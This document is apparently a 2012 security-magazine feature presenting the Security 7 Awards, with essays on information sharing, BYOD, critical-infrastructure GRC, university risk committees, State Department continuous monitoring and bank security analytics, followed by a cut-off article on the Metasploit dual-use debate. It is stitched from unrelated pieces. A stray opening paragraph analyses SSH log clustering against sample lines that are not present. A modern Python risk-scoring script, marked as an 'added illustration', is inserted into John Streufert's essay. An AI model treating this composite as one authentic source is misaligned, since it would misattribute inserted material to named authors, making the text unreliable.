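On the sample lines the three SSH failures within 30 seconds form one cluster, the kernel line its own, and the fourth SSH failure at 10:03:15 a third: it is 164 seconds after the cluster’s latest event, and because its pid and port differ it shares only 9 of 13 distinct terms (about 69 percent) with its predecessor, so even a wider window would not merge it at the 70 percent threshold. That brittleness of token-level rules is the limitation Ranum is pointing at.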


COVER STORY

THE SECURITY 7 AWARDS

Recognizing the industry’s best security professionals in 2012

TELECOMMUNICATIONS: Wade Baker
HEALTH CARE: Krishnan Chellakarai
IN MEMORIAM: Ron Knode
ENERGY & UTILITY: Doug Powell
EDUCATION: David Seidl
GOVERNMENT: John Streufert
FINANCIAL SERVICES: Preston Wood


2012 SECURITY 7 AWARDS: TELECOMMUNICATIONS

Dogma to Data

The information security field needs to overcome information sharing roadblocks to improve decision making. BY WADE BAKER

AS A STUDENT of information technology as well as security and management science, I often find myself looking at security issues through a “decision-oriented” lens. For the most part, these two disciplines make good bedfellows, especially when one considers that engineers dominate the information security field. Please don’t misinterpret this; I have a healthy respect for, and advocate our need for engineers (I’ve even helped teach and graduate some of them). However, not all of our problems are engineering problems, and I do believe our ability to truly manage information risk is hindered by a shortage of input from other disciplines. Although I’ve seen some improvement in this area in recent years, it hasn’t been enough.

One area where the engineering and management mindset clash is in decision making. The engineer asks, “What do I need to know to precisely formulate all factors in this decision?” Meanwhile, the management scientist asks, “What do I need to know to make a good (or at least better) decision?” In such matters, I side heavily with the management scientist.

WADE BAKER, Director of Security Research and Intelligence, Verizon

■ Primary analyst and author of Verizon’s annual Data Breach Investigations Report, which is widely cited in the information security industry.

■ Develops and publishes Verizon’s VERIS framework, part of an international effort to standardize security incident tracking and categorization for improved data collection, reporting, analysis and decision making.

■ Baker’s research for the President’s Information Technology Advisory Committee was featured in the group’s 2005 report, Cyber Security: A Crisis of Prioritization.


The obvious application of this is in evaluating potential security initiatives and information security decisions: “Should we do X, Y or Z?” In most cases, it’s impossible to precisely formulate all factors in the decision, so we tend to abandon the “scientific” route and revert to other less rigorous methods of making it. This is typically some form or mixture of compliance mandate (“We have no choice but to do X”), fear response (“We can’t allow some horrible thing, so let’s do Y”), or peer following (“Everyone else is doing Z, so we should too.”) And this is where our predominantly engineering mindset hurts us. Instead, we should realize that organizations have always made decisions using varying amounts of information of varying quality. Our dilemma is not new. Valid and vetted approaches—or models—exist for structured decisions with an abundance of precise data and also for unstructured problems with sparse amounts of “fuzzy” data. These models are out there and are eagerly waiting for us to apply them to problems in our domain.

But I’m not going to spend the rest of my allotted space discussing models. I started my career in information security as a modeler, but I’ve become much more of a muddler over time. Rather than trying to impose existing models or beliefs on a security problem, I’ve become much more interested in exploring data to see what it might have to say about those models and beliefs. On the downside, the message is often not as loud and clear as I’d like it to be—at least in the short term—but the upside is that the bits I do manage to discern are truer than my preconceptions. With enough data to muddle through, our measurements, models, beliefs and ultimately, our decisions, will be greatly improved.

That is why I like data and pursue every little bit (pardon the pun) I can get my hands on. I think it holds more promise for the future of this industry than dogma. A lack of appropriate (or appropriately used) models is certainly a challenge to security decision making, but lack of data is a more fundamental and critical one. Whether we’re a nation, organization or individual, we do not have data of sufficient quality or quantity to create and test models, make informed decisions or take justified action to manage information risk.

Many in our field recognize this and increasingly espouse information sharing as the remedy for our data disease. I won’t disagree with that prescription: We have precious little information on our own, but together we could construct a much more complete and accurate picture of the risk landscape. The problem with data sharing, however, is that it does not happen automatically. You hear a lot more people talking about it than actually doing it. Thus, while we may have the right prescription, it doesn’t appear that we’re consistently taking our meds.

One of the advantages to being a researcher is that you get to highlight and study the problems without having to immediately advocate definitive solutions. And I’m going to hide behind that here, because the challenges of information sharing won’t be solved after you read this. But I do hope to provide some sense of direction for tomorrow. In that spirit, I have found that the three primary roadblocks to successful security information sharing are language, trust and incentives.

By language, I mean we have no commonly agreed upon taxonomy for the information we need to share. If I’m speaking apples and you’re speaking oranges, we’re not going to have a mutual understanding. Thus, a common vocabulary is essential to building a data set of sufficient size and quality to meet our decision-making needs.

Assuming we overcome the language barrier in order to create apples-to-apples data, we must still trust each other enough to share it. In an industry dedicated to secrecy and protection, this runs counter to our mindset. Finding trustworthy partners and establishing trustworthy methods of sharing with them will be key to unlocking the potential that exists.

And that potential might be the most critical piece. At the end of the day, if there is no incentive to share, we’ll never put forth the effort to develop a common language or necessary trust. We must make it clear to those responsible for day-to-day security operations what they stand to gain in terms of effectiveness and efficiency with better information. We must help executives see how they can make better decisions and justify those decisions to others.

I’m not saying it’ll be easy, but I think we can do it. One of my favorite aspects of working on the Verizon Data Breach Investigations Reports is that I get to—hopefully—demonstrate that sharing sensitive information can actually work, even across public-private and international boundaries, and that the product of sharing is beneficial to many recipients at many different levels. I view it as a small contribution toward dispelling the dogma of today and driving better decisions for tomorrow.


2012 SECURITY 7 AWARDS: HEALTH CARE

Embracing BYOD

Organizations need to consider the benefits, IT challenges and risks when implementing a BYOD policy. BY KRISHNAN CHELLAKARAI

WITH A RISING need to be more productive, efficient and fast, there is recognition among business leaders that a more mobile workforce is becoming a true necessity. Enabling a mobile workforce is, however, an expensive proposition. Usage costs and the cost to purchase and maintain mobile devices, applications and backend services such as security have curtailed many businesses from offering employees a corporate-issued smartphone or tablet.

At the same time, there’s been a dramatic shift in consumer behavior with the introduction of smart devices like the iPhone, iPad and Android-based devices. More and more users are adopting and willingly using these non-sanctioned smart devices in their workplace to access corporate resources, a behavior that has indirectly benefited the businesses in many ways. As business leaders recognize the value of personally owned devices in the workplace, they are putting increasing pressure on IT to allow the use of these devices to access internal corporate resources.

KRISHNAN CHELLAKARAI, Global Principal Security Architect, Roche Pharma at Genentech (Roche Group)

■ As enterprise security architect at Genentech and Roche, Krishnan leads the development and implementation of a three- to five-year security roadmap for a global organization with more than 90 locations and 110,000 users.

■ Recently led a security audit remediation effort that transformed the security framework at Roche. New functionality includes application whitelisting software, behavior-based malware protection for Web and email, and strong authentication for remote access.

■ Published whitepapers on enterprise Web access management, cloud security and mobility, and choice computing.


This major shift in business behavior is challenging IT organizations in new ways. IT organizations are no longer in sole control of the end-user tools that they traditionally have dictated.

The first question to ask is, “Are we ready to embrace the trend of bring your own device (BYOD)?” The answer definitely should be “yes.” Many forward-thinking companies have already embraced the BYOD trend and are realizing the next significant increase in end-user productivity. BYOD is not a short-term movement; it is here to stay whether you have a BYOD policy in place or not.

In a nutshell, we should embrace the expanding business movement to BYOD instead of staying away or fighting the growing business demands driving it. Consider these organizational benefits of a BYOD strategy:

■ Increased productivity of the end user to do their job from anywhere, at any time.

■ Improved employee satisfaction by allowing end users the choice to use their own personal device.

■ Single device solution that eliminates the need for the end user to carry multiple devices.

■ Cost savings: No need to buy and issue a new device to end users.

Obviously, the next big question is how do we harness the benefits of the BYOD movement, yet mitigate IT challenges and the organizational risks linked with BYOD? These challenges can be vetted and addressed thoroughly via clear policies and business processes as described below:

■ IT security and privacy policy: Develop appropriate policy and procedures for employees and IT support staff on acceptable use policy and incident reporting.

■ Device ownership: Develop a terms-of-use consent form for employees to agree to and abide by prior to gaining access to corporate systems and data.

■ Device management standards: Manage the device using a centralized device management tool and enforce security controls such as password lock and application usage restrictions.

■ Securing the data: Deploy tools and enforce controls to secure the corporate data stored on the device.

■ Data segmentation: Separate personal data from corporate data on the devices.

■ IT support: IT support and additional training for supporting the personal devices and managing increased service desk calls.

■ Communication: Develop and communicate BYOD policy, procedures and support through security awareness training for end users.

■ Data plan: Monitor the cost of data plan usage; without such monitoring the organization has no way to determine the cost of personal use versus corporate use.

When embracing BYOD, organizations also need to be aware of the risks that are introduced with this policy. Key risks to evaluate are:

■ Application control: Uncontrolled and unsecured applications that could be installed on the device by the user.

■ Potential data loss: This requires eliminating or reducing exposure of sensitive and critical data.

■ Local labor laws/issues: Local and/or country labor laws that prevent users from working for more than normal working hours. Employment agreements need to be updated to manage possible Fair Labor Standards Act-related risk.

■ Potential privacy issue: Tools employed by IT to manage the device could monitor and track the location of the device, which may introduce a privacy issue in certain countries for the organization.

■ Regulatory requirements: Businesses that operate in specific industries like health care or finance fall under strict regulatory compliance mandates. SOX, HIPAA, GLBA, PCI DSS and other compliance frameworks outline which data must be protected and provide basic guidelines for how that data should be protected. Ensure regulatory compliance within BYOD policies.

■ Lost and stolen devices: End-user training for immediate reporting of loss or theft of a personal device with business access.

■ Data recovery: Clear delineation of who owns the data stored on the device and how to recover or wipe the data when an end user leaves the organization.

Embracing BYOD technology is just one of the many issues that IT must manage, but it may not be the biggest challenge. Legal ownership of data stored on a personal device may be an even bigger challenge for organizations to overcome. Defining the appropriate policies with the expectation that the criteria will be different for different business units and types of personnel is essential to managing organizational security. Creating the appropriate balance between benefits/risks within your organization will be critical to implementing a successful BYOD strategy.


2012 SECURITY 7 AWARDS: IN MEMORIAM

Security Warrior

Ron Knode, who passed away earlier this year, was a tireless advocate for cloud security transparency. BY JIM REAVIS

THE INFORMATION SECURITY industry has always attracted unique personalities with eclectic skill sets. Information security is not simply about solving mathematical problems, focusing on bandwidth, maximizing storage capacity or answering other questions with objective certainties. Information security is art and science, technology and strategy, thoughtful design, quick reflexes and matching wits with a skilled adversary. From software programming and finance to marketing and heavy doses of the Art of War, the typical information security skill sets are in fact atypical in the IT industry.

Ron Knode represented the prototypical information security professional of the future: He accomplished much in his career to advance the cause of the industry while relying upon a diverse skill set. Ron’s background as a military officer, scientist and professor allowed him to design sophisticated security systems, advocate for key structural changes in IT, and mentor many experts. Ron conducted himself with great energy and an even greater sense of humor.

A graduate of the U.S. Naval Academy, Ron developed security systems for the U.S. Department of Defense and the intelligence agencies, many of which are still in use today. Ron variously held roles as a chief scientist and systems architect before capping his career as consulting director for security and trust architectures and service for Computer Sciences Corporation (CSC). Ron was most passionate about his role as an educator as an associate professor at Towson University.

RON KNODE, Served as a Consulting Trust Architect for CSC’s Cloud Services

■ Adjunct associate professor, Towson University.

■ Member of the leadership team of the CSA and a co-chair of the CSA Governance, Risk and Compliance (GRC) stack initiative. Author of the CSA’s Cloud Trust Protocol (CTP), and head of the CTP initiative.

■ In Ron’s memory, the Cloud Security Alliance instituted the annual Ron Knode Service Award, recognizing excellence in volunteerism for three honorees from the Americas, Asia-Pacific and EMEA.

Ron’s impact upon the Cloud Security Alliance was significant. While at CSC, Ron invented a technical specification called Cloud Trust Protocol (CTP) for cloud transparency. CTP is a specification to automate the capability to query any type of cloud provider in order to understand the provider’s ability to meet customer requirements, including but not limited to security, governance, risk and compliance. The requirements to be evaluated are based on a concept of elements of transparency.

CSA discovered Ron and his CTP project and prevailed upon him and his employer to let CSA take over the development of CTP and incorporate it into the CSA Governance, Risk and Compliance (GRC) Stack. Ron joined CSA as part of the GRC leadership team and took an active role in the development of our research roadmap and GRC training. Ron’s fervent evangelism around the necessity of transparency on the part of providers was ahead of its time and quite influential in CSA’s strategy around GRC, including the development of the CSA Security, Trust and Assurance Registry (STAR). CSA volunteers will be working over the course of the next two years to fulfill Ron’s vision of robust security requirements, continuous monitoring and accountability on the part of cloud providers via transparency.

Beyond Ron’s tremendous technical prowess and business savvy, he was one of the most genuine and likeable people in our industry. Quick with a joke, caring about his co-workers, and dedicated to his family, Ron Knode was a one-of-a-kind security warrior who influenced many and left the world a better place.

JIM REAVIS is co-founder and executive director of the Cloud Security Alliance.


2012 SECURITY 7 AWARDS: ENERGY & UTILITY

Critical Needs

GRC management needs to adapt to meet the complex needs of critical infrastructure protection. BY DOUG POWELL

SECURITY THREAT RISK assessment tools in past decades were typically used to determine security mitigation strategies. Assessment consisted primarily of a paper and pen exercise that intended to compare existing security measures with accepted security practices of the day. A rash of ongoing or heightened security incidents often initiated the “security survey.” Completing these reviews relied on the expertise of a security professional who answered a number of predefined questions about practices, such as perimeter security, lighting, alarm systems, guard patrols and access control. These reviews focused on physical security and offered a limited risk management output; they were really a baselining exercise to align security practices of the day with the plant or facility. IT security did not become involved in risk assessments or surveys until after the new millennium.

Today, within the cyber world, risk assessment has often been used interchangeably with vulnerability assessment. Vulnerability assessment is an important part of a risk assessment, but the two are not equivalent. Increasingly, organizations are practicing governance, risk and compliance (GRC) assessments. Within IT-GRC, we see the formation of an important triad on which risk management relies heavily. Effective governance for IT management, comprehensive risk management and compliance management are necessary to ensure IT risk is properly managed across the enterprise. In fact, each leg of the triad relies on the other. GRC is still a developing practice within the IT world, but it will have an even greater impact as a critical infrastructure (CI) risk management tool if appropriately matured and adapted to CI protection needs.

DOUG POWELL, Manager of Security, Privacy and Safety at British Columbia Hydro & Power Authority

■ Oversees all aspects of security, privacy and safety within the smart grid program at BC Hydro, Canada’s third largest utility.

■ Successfully implemented the critical infrastructure protection program for BC Hydro during the 2010 Winter Olympic Games in Vancouver.

■ Contributes to standards development through ASIS and other organizations. Currently second vice chair of the ASIS Utilities Security Council and chairman of the ASIS Critical Infrastructure Working Group.

■ Received commendation in 2011 from the Royal Canadian Mounted Police Critical Infrastructure Intelligence Team for his contribution to critical infrastructure protection initiatives.

Typically, GRC management is referenced in the context of information technology needs. Within critical infrastructure applications, this usually translates into a discussion about critical cyber assets, systems and processes that support CI. This may or may not extend into operational technologies (OT) such as SCADA (supervisory control and data acquisition). For CI protection, though, there are two pressing concerns when discussing critical infrastructure risk management that GRC management has not yet adapted itself to in a comprehensive way. The first is the need for ongoing, real-time assessment (as opposed to periodic assessment), and the second relates to physical and situational awareness inputs. Without these inputs, GRC assessment has limited effectiveness for CI risk management.

Within critical infrastructure protection management, a constant state of vigilance is not possible or practical; many studies have shown that humans can’t remain on guard for extended periods of time. There should always be baseline vigilance, but protection systems must also be designed to provide automated, advanced alerts that permit an escalation for a defensive posture suitable for advanced, persistent threats. Some escalations may be rudimentary, while others are more complex, such as for a nuclear facility armed resistance or shutdown process. There are even more complex escalation processes that rely on the sharing of intelligence and lead to a coordinated defensive response with police or military. Such escalations normally involve initiation of special security rules, including special access rules, increased patrols, added security posts and vehicle inspections. Regardless, inputs to the ongoing risk assessment are needed in order for effective risk management decisions to be made at any level. Knowledge about targeted hacker threats, terrorist plots or complex malware can help escalate security across any CI sector. Knowledge about adversary capabilities helps to define protection requirements.

GRC assessment, therefore, has two imperatives in order to be effective for CI protection: It must be applicable to the physical environment associated with CI protection (plants, dams, pipelines, buildings, etc.), and it must also be adaptable to environmental triggers and changes that inform risk rankings and result in appropriate assessment, leading to effective risk treatment. GRC cannot be limited to IT and cannot be a series of one-off assessments. GRC requires daily inputs from as many relevant sources as possible to inform the true risk picture. Full situational awareness is necessary during periods of escalated CI protection, such as during the Olympic Games or civil unrest. That means monitoring and managing stresses on the environment across a broad array of infrastructure (border protection, transportation systems, venues, internationally protected persons, etc.) and over a larger geographic footprint. Given the complexities associated with critical infrastructure protection, such as international resource management within climates of social unrest, GRC may need even greater inputs to become a truly effective tool for CI protection.

2012 SECURITY 7 AWARDS: EDUCATION

Team Effort

Notre Dame created a committee to tackle risk assessment on an ongoing basis. BY DAVID SEIDL

HIGHER EDUCATION IS an interesting place to be if you are an information security professional. We work on campuses that are essentially small cities. Our organizations often provide our own utilities, fire departments, power and police, and deal with transient populations that often make up a significant percentage of the local area’s total when school is in session. Campuses often have a variety of independent IT organizations, and those organizations are asked to act as an ISP, providing networking to a populace that may require most normal security tools to get out of the way. We also have a population that, in some cases, designed the basic technologies we’re using.

DAVID SEIDL, Director of Information Security, University of Notre Dame

■ Leads Notre Dame’s SSN Remediation program, which is designed to reduce the risk of inadvertent disclosure of Social Security numbers. The three-pronged strategy includes technical remediation, business process reviews and the creation of a long-term governance structure for the management of highly sensitive information.

■ Managed Notre Dame’s Information Security Program, a four-year effort involving 24 projects to create a long-term security infrastructure for the university. Key projects included creation of Notre Dame’s Security Operations Center.

■ Cut vulnerability scanning costs by 50 percent in support of the university’s fiscal responsibility goals.

The security risks we face aren’t unique, but they are quite varied. Many security professionals from the business world that I talk with cringe when I describe a typical higher education environment! Thus, when I was asked to write about security in my area of expertise, I pondered common topics like phishing, reputation services, and what bring your own device (BYOD) means in an open environment. What I realized was that all of it came down to the way we look at risk as an organization. If we don’t get that right, our technologies and policies won’t matter much.

Every organization realizes at some point that it needs to assess the risks it faces. Some organizations choose a standardized model for security risk assessment; others use a model devised in-house or hire expensive consultants. The worst case is one that takes the unfortunate option of denial. What the organization chooses to do about risk is critical. Addressing risk can only be successful if management is willing to look at risks head-on and take ownership of the security risk assessment process and of handling them.

At Notre Dame, we do something that is relatively unique in my higher education experience. The executive vice president created—and personally chairs—a group known as the Institutional Risk and Compliance Committee. This group is composed of senior members of management, including functional roles like finance, IT and research, and covers each of the major business areas of the university. It is a diverse group with a big impact.

What makes the group different from many management teams is how it looks at risks, and how it reacts to risks. This diverse group has created a simple process of yearly assessments conducted by each major business area in the university. Risks must affect the university as a whole, and they’re categorized on a simple high, medium and low scale for probability and impact, and colored red, yellow or green. Each one is then rated on its current status: unhandled and needs a plan; in progress with a plan; or handled as well as it can be handled. Again, each risk is red, yellow or green based on its status—a separate rating from its probability and impact. A quick glance at a chart tells the group what needs attention or provides a status check. Red risks with a red status rating get attention quickly!

You will notice that the last rating for status isn’t “closed”—major risks to the organization are rarely something you can call done. Instead, you may complete your plan for handling the risks, but you continuously monitor them.

The broad view approach—the understanding that risks have a lifecycle—and the way members of the team work together are what sets this group apart. You see, over the life of the group, the members have become comfortable challenging each other and asking questions that help their peers take a different look at what they’re presenting. When the group gets together, sessions are lively. The sessions result in useful feedback and a lot of improvement in the risks that are identified, plans to address those risks and the entire group’s understanding of what the university faces.

The fact that executive-level support is needed to handle risks for an organization is nothing new, and every risk assessment manual mentions it. What then can you take away from this?

Two things: First, there is hope. If your organization isn’t addressing risk in a realistic way, put your leadership in touch with an organization that is. Have them talk about methods, costs and benefits. Second, look at how you treat the security risk assessment process. Is it something you share with your peers? Are they comfortable with being upfront about it? And, most importantly, do they think about risk over time, or simply as a set of controls? Answer these questions and you just might realize it’s time to change how your organization handles the next big security risk.

2012 SECURITY 7 AWARDS: GOVERNMENT

Continuous Protection

The U.S. Department of State developed a system for improving federal cybersecurity that can be used as a blueprint in the public and private sectors. BY JOHN STREUFERT

HISTORICALLY, THE CYBERSECURITY protection activities associated with the Federal Information Security Management Act (FISMA) of 2002 hinged on security reviews of process and compliance in the form of hard-copy documents contained within three-ring binders at a cost of $440 million per year across the federal government. By late 2009, $130 million had been spent at the Department of State alone (at a cost of $1,400 per page), with descriptions of overall technical risk for specific major systems that were rapidly out of date.

JOHN STREUFERT, Director, National Cyber Security Division, Department of Homeland Security

■ In 2003, while deputy CIO for the U.S. Agency for International Development, created a technique to find and fix known vulnerabilities across 22 time zones for the U.S. Agency for International Development. Refined these techniques for scoring risk, which were later called Continuous Monitoring, while serving as Department of State CISO from 2006-2012.

■ Responsible for proposing revised FISMA practices that transition manual control testing to automated processes and hold promise for a higher return on investment for the $1.5 billion spent annually in this part of the federal cybersecurity portfolio.

■ Created a Concept of Operations for a phased implementation of Continuous Monitoring for federal cloud computing as part of the Federal Risk and Authorization Management Program (FedRAMP).

■ Leads DHS effort to define and develop data metrics for evaluating results to improve federal civilian cybersecurity defenses in the CyberScope security reporting program.

Though federal systems were being exploited at Internet speed, FISMA compliance and its applicable authorities required manual security testing at least every three years. The dichotomy between federal requirements and what was actually needed to provide cybersecurity spurred the evolution to continuous monitoring and mitigation.

Exploits use known cyber vulnerabilities and configuration setting weaknesses as the method of attack more than 80 percent of the time. In response, the U.S. Department of State automated scripts to scan its personal computers and servers at 260 embassies and consulates every one to three days. Commercial off-the-shelf sensors delivered details of unresolved security problems to an enterprise dashboard for attention to the worst problems first. By the end of July 2009, measured cyber risks were reduced by 89 percent across 24 time zones of department operations, and were published daily using letter grades A to F to mark progress. In the second year, one-third of the remaining risk across the enterprise was reduced to the 94 percent level, an accomplishment that was sustained over time.

The Department of State scores every security problem it finds, but assigns the highest point value to critical risks. Using a dashboard called iPost, system administrators’ attention was focused on the worst threats of the day. Critical patch coverage at the Department of State was repeatedly accomplished at the 84 percent level in seven days and the 93 percent level in one month.
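As an added illustration, not the Department of State’s iPost code (whose scoring rules are not given here), the following Python sketches a worst-problems-first scoring dashboard of the kind the article describes: every unresolved finding earns points, critical findings weigh the most, findings left open gain weight with age, sites are ordered worst first and graded A to F against their own baseline scan, and the enterprise-wide reduction is reported as a percentage. The point values, the aging rule, the grade cut-offs and the sample findings are all assumptions constructed for this example.

```python
"""Worst-problems-first risk scoring with A-F grades: an illustrative scheme."""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

# Assumed point values: critical findings weigh the most, as the article
# describes. These are not the Department of State's actual iPost weights.
SEVERITY_POINTS = {"critical": 10.0, "high": 5.0, "medium": 2.0, "low": 0.5}

# Assumed aging rule: an unresolved finding gains 10 percent of its base
# points per day open, capped at double, so a critical left open all week
# outranks one found today.
MAX_AGE_DAYS = 10

# Assumed grade cut-offs: share of the site's own baseline risk still present.
GRADE_CUTOFFS = (("A", 0.10), ("B", 0.25), ("C", 0.50), ("D", 0.75))


@dataclass(frozen=True)
class Finding:
    site: str
    host: str
    severity: str   # one of SEVERITY_POINTS
    days_open: int  # days since the sensor first reported it


def finding_score(f: Finding) -> float:
    """Points for one unresolved finding: base points scaled by age."""
    base = SEVERITY_POINTS[f.severity]
    return base * (10 + min(f.days_open, MAX_AGE_DAYS)) / 10


def site_scores(findings: Iterable[Finding], sites: Iterable[str]) -> Dict[str, float]:
    """Total points per site; a site with nothing open scores 0."""
    totals = {s: 0.0 for s in sites}
    for f in findings:
        totals[f.site] = totals.get(f.site, 0.0) + finding_score(f)
    return totals


def letter_grade(current: float, baseline: float) -> str:
    """Grade a site by how much of its own baseline risk remains."""
    if baseline <= 0:
        return "A"
    remaining = current / baseline
    for grade, cutoff in GRADE_CUTOFFS:
        if remaining <= cutoff:
            return grade
    return "F"


def worst_first(scores: Dict[str, float]) -> List[Tuple[str, float]]:
    """Order sites so the worst problems get attention first."""
    return sorted(scores.items(), key=lambda kv: kv[1], reverse=True)


def risk_reduction_pct(baseline: Dict[str, float], current: Dict[str, float]) -> float:
    """Enterprise-wide reduction in measured risk versus the baseline scan."""
    b, c = sum(baseline.values()), sum(current.values())
    return 0.0 if b == 0 else 100.0 * (b - c) / b


def dashboard(baseline, current, sites):
    """Rows of (site, score, grade), worst first, plus the overall reduction."""
    b = site_scores(baseline, sites)
    c = site_scores(current, sites)
    rows = [(site, score, letter_grade(score, b.get(site, 0.0)))
            for site, score in worst_first(c)]
    return rows, risk_reduction_pct(b, c)


# Constructed sample data: a first scan and a re-scan one week later.
SITES = ["embassy-a", "embassy-b", "consulate-c"]
BASELINE = [
    Finding("embassy-a", "ws-01", "critical", 0),
    Finding("embassy-a", "ws-02", "critical", 0),
    Finding("embassy-a", "srv-01", "high", 0),
    Finding("embassy-a", "ws-03", "medium", 0),
    Finding("embassy-b", "srv-02", "high", 0),
    Finding("embassy-b", "ws-04", "low", 0),
    Finding("consulate-c", "srv-03", "critical", 0),
    Finding("consulate-c", "ws-05", "low", 0),
    Finding("consulate-c", "ws-06", "low", 0),
]
# A week on: consulate-c fixed everything, embassy-b has one low left,
# embassy-a left a critical and a medium unpatched and both have aged.
CURRENT = [
    Finding("embassy-a", "ws-01", "critical", 7),
    Finding("embassy-a", "ws-03", "medium", 7),
    Finding("embassy-b", "ws-04", "low", 7),
]

if __name__ == "__main__":
    rows, reduction = dashboard(BASELINE, CURRENT, SITES)
    for site, score, grade in rows:
        print(f"{site:12s} {score:6.2f}  grade {grade}")
    print(f"enterprise risk reduced {reduction:.0f}% since baseline")
```

Run as a script it lists embassy-a first with an F, embassy-b with a B and consulate-c with an A. Embassy-a fixed two of its four findings but still fails, because the critical it left open has grown to 17 points on its own and the site still carries more than three-quarters of its baseline risk; that aging pressure is what keeps a stale critical at the top of the list day after day.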

In January 2012, the Department of Homeland Security assembled a team to implement these cybersecurity strategies across the .gov network using funding set aside in the fiscal year 2012 federal budget. In August 2012, agreement in the House and the Senate signaled their support for a continuous cyber diagnosis and mitigation program.

The next generation of cyber defenses will combine appropriate dashboard software features and sensors based on the Center for Strategic and International Studies 20 Critical Security Controls for Effective Cyber Defense. In June, DHS announced specifications for the first phase of continuous monitoring and mitigation sensors, focused on hardware and software asset management, whitelisting/anti-malware defenses, and vulnerability and compliance setting management.

While plans for the future are still unfolding, the General Services Administration intends to issue multiple award contracts for the federal government to buy cybersecurity tools for implementing continuous monitoring and mitigation, with options available for other federal, state and local governments to make purchases for their separately operated defenses. The design of this acquisition aims for cybersecurity strategies that:

■ Organize defenses around sensors mapped to the 20 Critical Controls (in phases);

■ Inspect systems daily, diagnose and then mitigate security problems across all federal networks, applications and cloud-based services over time;

■ Prioritize attention on those risks with the most impact and potential for occurring; and

■ Measure the results and report progress in dealing with known cyberthreats to technicians, managers, executives and the public.

Adequate cybersecurity is a problem of national significance that warrants attention. Utilizing the combined buying power of federal, state and local governments to receive quantity discounts for cybersecurity tools helps maximize benefits for the taxpayer.

Establishing a continuous diagnosis and mitigation (CDM) program for your state or local government or for your business is an opportunity within grasp. These concepts were developed at taxpayers’ expense for the protection of federal networks, but are available and adaptable for the public or private sector, on a strictly voluntary basis. Send requests for further information to the Department of Homeland Security at [email protected].

2012 SECURITY 7 AWARDS: FINANCIAL SERVICES

New Era

The information security industry needs to shift its focus to data-driven security. BY PRESTON WOOD

INFORMATION SECURITY HAS long been a profession with a keen focus on preventative controls. However, with the cyberthreat becoming increasingly complex, I believe most information security functions need to adopt a control posture that includes sophisticated rapid detection and response capabilities, in addition to preventative controls, to continue to effectively mitigate risk. This requires harnessing the power of analytics to turn data into intelligence (detection) in order to take rapid action (response). Enter the era of big data security analytics and data-driven security.

To illustrate this point, I’d like to contrast a traditional preventative information security practice to bank branch security. If information security professionals were to secure a branch using a preventative control mindset, the controls might look like this:

■ Armed guards at every known entrance to the building (firewalls);

■ Frisking procedures for anyone entering the building (virus scanning);

■ Blocking access to anyone who can’t clearly state why they want to enter the building (firewall rules); and

■ Once inside, armed guards continue to probe for appropriate conduct (data loss prevention, or DLP).

PRESTON WOOD, Executive VP and Chief Information Security Officer, Zions Bancorporation

■ Oversees fraud, security analytics and forensics, information security, physical security, corporate investigations, technology and operations risk, and business resiliency objectives for eight banks in eight high-growth Western markets.

■ More than 15 years of hands-on experience in IT, security and risk capacity.

■ Served in multiple leadership and staff capacities throughout his career, giving him a unique blend of skills, combining real-world business and technology experience with a keen understanding of security and risk management.

Clearly, a bank that adopts these security procedures for its branches might not have many customers visiting its branches.

In order for a bank branch to operate as intended, a particular risk needs to be recognized; people need to enter the branch to conduct business. The problem is, we don’t know if these people are honest law-abiding customers or criminals intending to steal from us. To mitigate risk for the branch without inconveniencing customers, we focus equally on prevention, detection and response controls (video surveillance, employee response procedures, rapid law enforcement involvement, etc.). These types of controls help keep risk at an acceptable level.

Like an unknown threat entering a bank branch, it is difficult to quickly determine the threat and mitigate risk to information systems without adopting sophisticated rapid detection and response capabilities and a more data-driven approach to decision making.

We started down our big data journey of becoming a data-driven security organization many years ago when we realized our security information and event management (SIEM) platform was underperforming, and ultimately not helping us truly analyze the data we were capturing. Rather than continue to support a platform that didn’t allow us to become more data-driven, we recognized that in order to capture, retain and analyze data we needed to invest in an infrastructure much more akin to business intelligence technologies than traditional security technologies. Over the past six years we have invested in people with the skills to analyze data and technologies with the scale and performance to adequately handle the massive amounts of data necessary for robust security analytics. This has resulted in what we like to call our security data warehouse.

The core of our security data warehouse is Hadoop, but it is not the sole technology that makes up our analytic capabilities. The security data warehouse is more of an ecosystem of technologies assembled in a way that allows us to store massive amounts of varying data, quickly access this data for analysis, and turn the analysis into actionable intelligence. Fortunately, technologies are now being made available for organizations to create their own security analytics ecosystem.

Having the technology in place to leverage big data for security is only part of the equation—it is equally important to have people with the skill set to conduct analysis. No tool will magically turn data into intelligence; it takes people with inquisitive minds and data analytics skill sets to make connections between varieties of data points.

Unfortunately, because the industry has focused so long on preventative control solutions (and often commercial off-the-shelf preventative solutions), I believe there will be a call for security professionals to become more data driven. This call for relearning will require security professionals to start asking questions of their data and to develop more data analytic skills.

I believe we are on the edge of an exciting new era for the information security field, an era in which organizations have the ability to analyze internal and external data and turn it into actionable intelligence. Those who choose to adopt a data-driven direction will be able to better rationalize their control costs, blend quantitative and qualitative decision making for improved risk management, and ultimately gain a much-needed edge in our rapidly changing information economy.

THREAT MANAGEMENT

By George V. Hulme

METASPLOIT: SECURITY SALVATION OR SABOTAGE?

Some say Metasploit is a critical tool for improving enterprise security, while others say it helps attackers.

IS THERE SUCH a thing as a security tool that’s too effective? Sounds silly. You’d probably never hear of a firewall being called too effective or an encryption algorithm as being too uncrackable. However, some observers have, over the years, accused the Metasploit penetration testing framework of being just that: too fast at publishing exploits and too good at taking advantage of vulnerabilities in the networks it’s used against.

One recent example of why Metasploit raises concern involved a Java zero-day vulnerability that surfaced in August and affected millions of users of common Web browsers—Internet Explorer, Mozilla, Firefox, Safari on Windows, Linux, as well as Mac OS X systems. Attacks on the flaw made it possible to compromise at-risk systems. And, before Oracle released a patch for the flaw, publicly available exploit code was added to the Metasploit framework.

Such tools can be used to help security pros and system owners strengthen and test their security, but they can also be used by criminals to break into vulnerable systems. This “dual-use” capability of Metasploit has made it controversial at times, and such tools have even been outlawed in some nations. One of the biggest concerns often cited is that when exploits are released, attackers can put them to use quicker than organizations can patch their dozens, or even tens of thousands, of systems.

METASPLOIT REVIEW: HELP OR HINDRANCE?

Not surprisingly, HD Moore, the creator of Metasploit, one of the founders and current chief architect of the initiative, and chief security officer at Boston-based security vendor Rapid7, has a much different view. Metasploit is maintained by Rapid7, which acquired the framework in 2009.

